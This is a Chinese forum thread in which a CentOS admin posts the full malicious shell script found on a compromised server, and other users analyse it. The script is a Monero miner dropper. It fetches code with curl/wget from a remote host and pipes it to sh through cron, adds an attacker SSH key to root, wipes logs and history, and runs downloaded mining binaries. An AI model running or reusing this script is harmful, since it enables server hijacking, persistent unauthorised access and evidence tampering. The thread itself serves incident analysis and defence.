Linux 被黑了,来看看这是什么回事。。。

2018-04-16 14:36:27 +08:00
 dengshuang

系统 centos7

今天看到服务器报警 68%的 cpu 被用。我也没干嘛啊。 用 htop 看到如下:

很浪啊,赶紧 kill -9 杀掉进程,单一下子就有起来了。 灵光一闪,查看 crontab,如图: 用 crontab 里的链接下载了这个 sh:

#!/bin/bash
ps -ef | grep crypto-pool | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep nanopool | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep supportxmr | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep minexmr | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep dwarfpool | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep xmrpool | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep moneropool | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep xmr | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep monero | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep udevs | grep -v grep | awk '{print $2}' | xargs kill -9
ps -ef | grep kworkers | grep -v grep | awk '{print $2}' | xargs kill -9
skill -KILL udevs
skill -KILL kworkers
rm -rf /var/lib/apt/lists/*
apt-get update
apt-get install wget -y
apt-get install libcurl4-openssl-dev -y
apt-get install python-pip -y
apt-get install ca-certificates -y
apt-get install redis-tools -y
apt-get install python gcc -y
apt-get install python-setuptools python-dev build-essential -y --allow-unauthenticated
yum -y install epel-release
yum -y install wget gcc redis git python-pip ca-certificates
echo "0 * * * * curl -fsSL http://chrome.zer0day.ru:5050/mrx1 | sh" > /var/spool/cron/root
echo "0 * * * * wget -q -O- http://chrome.zer0day.ru:5050/mrx1 | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
mkdir -p /root/.ssh/
echo "0 * * * * curl -fsSL http://chrome.zer0day.ru:5050/mrx1 | sh" > /var/spool/cron/crontabs/root
echo "0 * * * * wget -q -O- http://chrome.zer0day.ru:5050/mrx1 | sh" >> /var/spool/cron/crontabs/root
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDV1VxPVZFUOOWZwMFVBwP/904lhAZNj2U5DPsZyIWw33jHeFRElM++XnUYmkMDiu8KuJXnFDJMkyXxsq77fOpDhVGOoexll3+P6SmZWViWwnhOgvxhccgT72J+LPZEIwPqPZQVHR4ksdVSnMVreyZs+rQ7O+L2xychpqzeIrk4Q/08f5XreOnq4Rgxp9oKwSlf7vKmQ7tUWUxfMHHL1wQYZPmdKpgSi/JmokLpp5cKAT7r0gGOj1jV8ZAJc+z45Ts2JBH9JYscHBssh7MBWWymcjXANd9a6XaQnbnl6nOFFNyYm8dBuLkGpEUNCdMq/jc5YLfnAnbGVbBMhuWzaWUp root@host-10-10-10-26" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
PS3=$(iptables -L | grep 6379 | wc -l)
if [ $PS3 -eq 0 ];
then
yum -y install iptables-services
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT
service iptables save
/etc/init.d/iptables-persistent save
fi
echo "" > /var/log/wtmp
echo "" > /var/log/secure
history -c
if [ ! -f "/tmp/migrations" ];then
wget https://transfer.sh/SstPD/clay  --no-check-certificate -O /tmp/clay && chmod +x /tmp/clay
wget https://transfer.sh/q4oJN/nodexx --no-check-certificate -O /tmp/migrations && chmod 777 /tmp/migrations
curl -sk https://transfer.sh/q4oJN/nodexx -o /tmp/migrations && chmod 777 /tmp/migrations
fi
cd /tmp
PS1=$(ps aux | grep clay | grep -v "grep" | wc -l)
if [ $PS1 -eq 0 ];
then
    /tmp/clay &
fi
PS2=$(ps aux | grep migrations | grep -v "grep" | wc -l)
if [ $PS2 -eq 0 ];
then
    /tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B
fi
if [ $? -ne 0 -a $PS2 -eq 0 ];
then
wget https://transfer.sh/pQMdB/glibc-2.14.tar.gz --no-check-certificate -O /tmp/glibc-2.14.tar.gz && tar zxvf /tmp/glibc-2.14.tar.gz -C / && export LD_LIBRARY_PATH=/opt/glibc-2.14/lib:$LD_LIBRARY_PATH && /tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B && echo "" > /var/log/wtmp && echo "" > /var/log/secure && history -c 
fi
if [ $PS3 -eq 0 ];
then
yum -y install iptables-services
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT
service iptables save
/etc/init.d/iptables-persistent save
fi


各位猜猜他是不是要挖矿。 我现在只是把外网用防火墙给卡断了,想仔细研究研究他到底在干嘛

12359 次点击
所在节点    Linux
45 条回复
Rootcat
2018-04-16 15:44:15 +08:00
看了这个,我竟然想到的是拿我闲置的服务器来挖门罗币,不知道能挖多少。。。
lopetver
2018-04-16 15:45:10 +08:00
migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B

这条命令已经说明是在挖矿了
kongkongyzt
2018-04-16 15:47:11 +08:00
@dengshuang #1 +1, 刚想回这个, 这条 hhh
lopetver
2018-04-16 15:57:17 +08:00
@kongkongyzt 求解这条是什么意思
FindBoyFriend
2018-04-16 16:01:56 +08:00
一项喜欢用 keys 登陆 ssh,就差两步验证了
f2f2f
2018-04-16 16:13:32 +08:00
@jasonyang9 然而即便留了 15% 很多商家还是会直接把这样的 vps 给 suspend 了 #滑稽
imaning
2018-04-16 16:41:57 +08:00
@Rootcat 照这么说,我手上有 3 台服务器,都是闲置的,我也该去试试挖矿?
king2014
2018-04-16 16:44:23 +08:00
@lopetver 直接加入自己的密钥,可以随时登录了,不需要密码
dengshuang
2018-04-16 16:44:33 +08:00
@lopetver 免密码 登陆
airycanon
2018-04-16 16:53:54 +08:00
你是不是用 root 启动 redis 了并且对外网是开放的?
sdzwb
2018-04-16 16:56:48 +08:00
这是服务器被入侵,同时用于挖矿的步骤啊。
要杜绝还得找服务器漏洞的根源,然后再去堵。
YMB
2018-04-16 17:10:16 +08:00
前段时间研究过 redis 漏洞,但新版本貌似怎么都不能生效,楼主 redis 版本是多少?
有可疑 key 之类的一些信息吗,有的话麻烦提供一下大家研究研究
ZackB0T
2018-04-16 17:15:41 +08:00
最简单的方式,云墙 设置下 ssh 端口么? ip 或者 IP 段放行。
挖门罗的
打算挖的,给你个参考,G620 CentOS 倆核算力 50,如果支持 aes 能快不少。但是 cpu 自己挖电费回不来,矿池一般 0.3 提,这算力基本一年提不出来。
YumeMichi
2018-04-16 18:21:36 +08:00
让我想起我司一台测试服务器上的 redis 没有设置密码 然后因为版本也不是最新的 就被人利用漏洞种过挖矿程序
Miy4mori
2018-04-16 18:50:45 +08:00
@Felldeadbird 你怎么理解到良心的,明显怕后来人把自己蹬了啊。
jeffson
2018-04-16 19:11:16 +08:00
stratum+tcp://pool.zer0day.ru:8080 必然是挖矿啊
lusi1990
2018-04-16 19:28:29 +08:00
我也被黑锅,cpu 占用了 100%
DeWhite
2018-04-16 20:06:31 +08:00
@jasonyang9 我之前查日志菜发现 只被用了 50%,这不算良心
projectzoo
2018-04-16 23:03:32 +08:00
@dengshuang #1 有点意思,这个。。
msg7086
2018-04-17 00:00:43 +08:00
无密码全球公开 root 账户运行的 redis,不拿来挖矿难道还留着过年?

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/447200

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX